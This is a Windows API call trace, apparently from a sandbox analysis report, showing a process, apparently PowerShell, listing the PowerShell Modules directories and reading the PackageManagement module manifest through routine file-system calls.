	[0058.723] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18b400, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a
	[0058.723] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b840) returned 1
	[0058.723] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18b920 | out: lpFileInformation=0x184c18b920*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0058.723] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b800) returned 1
	[0058.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x184c18b400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32
	[0058.723] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b840) returned 1
	[0058.723] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18b920 | out: lpFileInformation=0x184c18b920*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1
	[0058.723] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b800) returned 1
	[0058.723] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b730) returned 1
	[0058.723] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18b220, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a
	[0058.723] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\", nBufferLength=0x105, lpBuffer=0x184c18b1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\", lpFilePart=0x0) returned 0x2b
	[0058.723] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*", lpFindFileData=0x184c18b3d0 | out: lpFindFileData=0x184c18b3d0) returned 0x1505fc88730
	[0058.723] FindNextFileW (in: hFindFile=0x1505fc88730, lpFindFileData=0x184c18b420 | out: lpFindFileData=0x184c18b420) returned 1
	[0058.724] FindNextFileW (in: hFindFile=0x1505fc88730, lpFindFileData=0x184c18b420 | out: lpFindFileData=0x184c18b420) returned 1
	[0058.724] FindNextFileW (in: hFindFile=0x1505fc88730, lpFindFileData=0x184c18b420 | out: lpFindFileData=0x184c18b420) returned 1
	[0058.724] FindNextFileW (in: hFindFile=0x1505fc88730, lpFindFileData=0x184c18b420 | out: lpFindFileData=0x184c18b420) returned 1
	[0058.724] FindNextFileW (in: hFindFile=0x1505fc88730, lpFindFileData=0x184c18b420 | out: lpFindFileData=0x184c18b420) returned 1
	[0058.724] FindNextFileW (in: hFindFile=0x1505fc88730, lpFindFileData=0x184c18b420 | out: lpFindFileData=0x184c18b420) returned 0
	[0058.724] FindClose (in: hFindFile=0x1505fc88730 | out: hFindFile=0x1505fc88730) returned 1
	[0058.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b680) returned 1
	[0058.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b640) returned 1
	[0058.724] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b730) returned 1
	[0058.724] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18b220, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a
	[0058.724] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\", nBufferLength=0x105, lpBuffer=0x184c18b1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\", lpFilePart=0x0) returned 0x2b
	[0058.725] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*", lpFindFileData=0x184c18b3d0 | out: lpFindFileData=0x184c18b3d0) returned 0x1505fc87950
	[0058.725] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18b420 | out: lpFindFileData=0x184c18b420) returned 1
	[0058.725] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18b420 | out: lpFindFileData=0x184c18b420) returned 1
	[0058.725] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18b420 | out: lpFindFileData=0x184c18b420) returned 1
	[0058.725] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18b420 | out: lpFindFileData=0x184c18b420) returned 1
	[0058.725] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18b420 | out: lpFindFileData=0x184c18b420) returned 1
	[0058.725] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18b420 | out: lpFindFileData=0x184c18b420) returned 0
	[0058.725] FindClose (in: hFindFile=0x1505fc87950 | out: hFindFile=0x1505fc87950) returned 1
	[0058.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b680) returned 1
	[0058.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b640) returned 1
	[0058.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.726] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x184c18b090, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c
	[0058.726] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\", nBufferLength=0x105, lpBuffer=0x184c18b030, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\", lpFilePart=0x0) returned 0x3d
	[0058.726] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*", lpFindFileData=0x184c18b240 | out: lpFindFileData=0x184c18b240) returned 0x1505fc884f0
	[0058.726] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b290 | out: lpFindFileData=0x184c18b290) returned 1
	[0058.726] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b290 | out: lpFindFileData=0x184c18b290) returned 1
	[0058.726] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b290 | out: lpFindFileData=0x184c18b290) returned 0
	[0058.726] FindClose (in: hFindFile=0x1505fc884f0 | out: hFindFile=0x1505fc884f0) returned 1
	[0058.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.726] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x184c18b090, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c
	[0058.726] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\", nBufferLength=0x105, lpBuffer=0x184c18b030, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\", lpFilePart=0x0) returned 0x3d
	[0058.727] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*", lpFindFileData=0x184c18b240 | out: lpFindFileData=0x184c18b240) returned 0x1505fc884f0
	[0058.727] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b290 | out: lpFindFileData=0x184c18b290) returned 1
	[0058.727] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b290 | out: lpFindFileData=0x184c18b290) returned 1
	[0058.727] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b290 | out: lpFindFileData=0x184c18b290) returned 0
	[0058.727] FindClose (in: hFindFile=0x1505fc884f0 | out: hFindFile=0x1505fc884f0) returned 1
	[0058.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.727] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b410) returned 1
	[0058.727] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x184c18af00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44
	[0058.727] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x184c18aea0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\", lpFilePart=0x0) returned 0x45
	[0058.728] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*", lpFindFileData=0x184c18b0b0 | out: lpFindFileData=0x184c18b0b0) returned 0x1505fc884f0
	[0058.728] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.728] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.728] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.728] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.728] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.728] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.729] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.729] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.729] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.729] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.729] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.729] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.729] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 0
	[0058.729] FindClose (in: hFindFile=0x1505fc884f0 | out: hFindFile=0x1505fc884f0) returned 1
	[0058.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b360) returned 1
	[0058.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b320) returned 1
	[0058.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b410) returned 1
	[0058.730] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x184c18af00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44
	[0058.730] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x184c18aea0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\", lpFilePart=0x0) returned 0x45
	[0058.730] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*", lpFindFileData=0x184c18b0b0 | out: lpFindFileData=0x184c18b0b0) returned 0x1505fc884f0
	[0058.730] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.730] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.730] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.730] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.731] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.731] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.731] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.731] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.731] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.731] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.731] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.731] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.731] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 0
	[0058.731] FindClose (in: hFindFile=0x1505fc884f0 | out: hFindFile=0x1505fc884f0) returned 1
	[0058.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b360) returned 1
	[0058.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b320) returned 1
	[0058.732] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x184c18afa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44
	[0058.732] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x184c18b000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44
	[0058.732] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b440) returned 1
	[0058.732] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1"), fInfoLevelId=0x0, lpFileInformation=0x184c18b520 | out: lpFileInformation=0x184c18b520*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0058.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b400) returned 1
	[0058.732] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b470) returned 1
	[0058.732] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x184c18af60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44
	[0058.732] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x184c18af00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\", lpFilePart=0x0) returned 0x45
	[0058.732] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*", lpFindFileData=0x184c18b110 | out: lpFindFileData=0x184c18b110) returned 0x1505fc884f0
	[0058.732] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b160 | out: lpFindFileData=0x184c18b160) returned 1
	[0058.732] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b160 | out: lpFindFileData=0x184c18b160) returned 1
	[0058.733] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b160 | out: lpFindFileData=0x184c18b160) returned 1
	[0058.733] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b160 | out: lpFindFileData=0x184c18b160) returned 1
	[0058.733] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b160 | out: lpFindFileData=0x184c18b160) returned 1
	[0058.733] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b160 | out: lpFindFileData=0x184c18b160) returned 1
	[0058.733] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b160 | out: lpFindFileData=0x184c18b160) returned 1
	[0058.733] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b160 | out: lpFindFileData=0x184c18b160) returned 1
	[0058.733] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b160 | out: lpFindFileData=0x184c18b160) returned 1
	[0058.733] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b160 | out: lpFindFileData=0x184c18b160) returned 1
	[0058.733] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b160 | out: lpFindFileData=0x184c18b160) returned 1
	[0058.734] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b160 | out: lpFindFileData=0x184c18b160) returned 1
	[0058.734] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b160 | out: lpFindFileData=0x184c18b160) returned 0
	[0058.734] FindClose (in: hFindFile=0x1505fc884f0 | out: hFindFile=0x1505fc884f0) returned 1
	[0058.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b3c0) returned 1
	[0058.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b380) returned 1
	[0058.734] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psd1")) returned 0xffffffff
	[0058.734] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psm1")) returned 0xffffffff
	[0058.734] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.cdxml")) returned 0xffffffff
	[0058.734] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.xaml")) returned 0xffffffff
	[0058.734] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.dll")) returned 0xffffffff
	[0058.735] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x184c18b190, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c
	[0058.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5d0) returned 1
	[0058.735] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x184c18b6b0 | out: lpFileInformation=0x184c18b6b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0058.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b590) returned 1
	[0058.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b600) returned 1
	[0058.735] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x184c18b0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c
	[0058.735] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\", nBufferLength=0x105, lpBuffer=0x184c18b090, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\", lpFilePart=0x0) returned 0x3d
	[0058.735] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*", lpFindFileData=0x184c18b2a0 | out: lpFindFileData=0x184c18b2a0) returned 0x1505fc87950
	[0058.735] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18b2f0 | out: lpFindFileData=0x184c18b2f0) returned 1
	[0058.735] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18b2f0 | out: lpFindFileData=0x184c18b2f0) returned 1
	[0058.735] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18b2f0 | out: lpFindFileData=0x184c18b2f0) returned 0
	[0058.735] FindClose (in: hFindFile=0x1505fc87950 | out: hFindFile=0x1505fc87950) returned 1
	[0058.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b550) returned 1
	[0058.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b510) returned 1
	[0058.736] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x184c18b200, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b
	[0058.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b640) returned 1
	[0058.736] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18b720 | out: lpFileInformation=0x184c18b720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8)) returned 1
	[0058.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b600) returned 1
	[0058.736] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x184c18af00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b
	[0058.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b3e0) returned 1
	[0058.736] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x8fc
	[0058.736] GetFileType (hFile=0x8fc) returned 0x1
	[0058.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b350) returned 1
	[0058.736] GetFileType (hFile=0x8fc) returned 0x1
	[0058.736] ReadFile (in: hFile=0x8fc, lpBuffer=0x15047728118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b4b8, lpOverlapped=0x0 | out: lpBuffer=0x15047728118*, lpNumberOfBytesRead=0x184c18b4b8*=0x5f8, lpOverlapped=0x0) returned 1
	[0058.736] ReadFile (in: hFile=0x8fc, lpBuffer=0x15047727650, nNumberOfBytesToRead=0x208, lpNumberOfBytesRead=0x184c18b4b8, lpOverlapped=0x0 | out: lpBuffer=0x15047727650*, lpNumberOfBytesRead=0x184c18b4b8*=0x0, lpOverlapped=0x0) returned 1
	[0058.736] ReadFile (in: hFile=0x8fc, lpBuffer=0x15047728118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b4b8, lpOverlapped=0x0 | out: lpBuffer=0x15047728118*, lpNumberOfBytesRead=0x184c18b4b8*=0x0, lpOverlapped=0x0) returned 1
	[0058.736] CloseHandle (hObject=0x8fc) returned 1
	[0058.737] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff
	[0058.738] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff
	[0058.738] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff
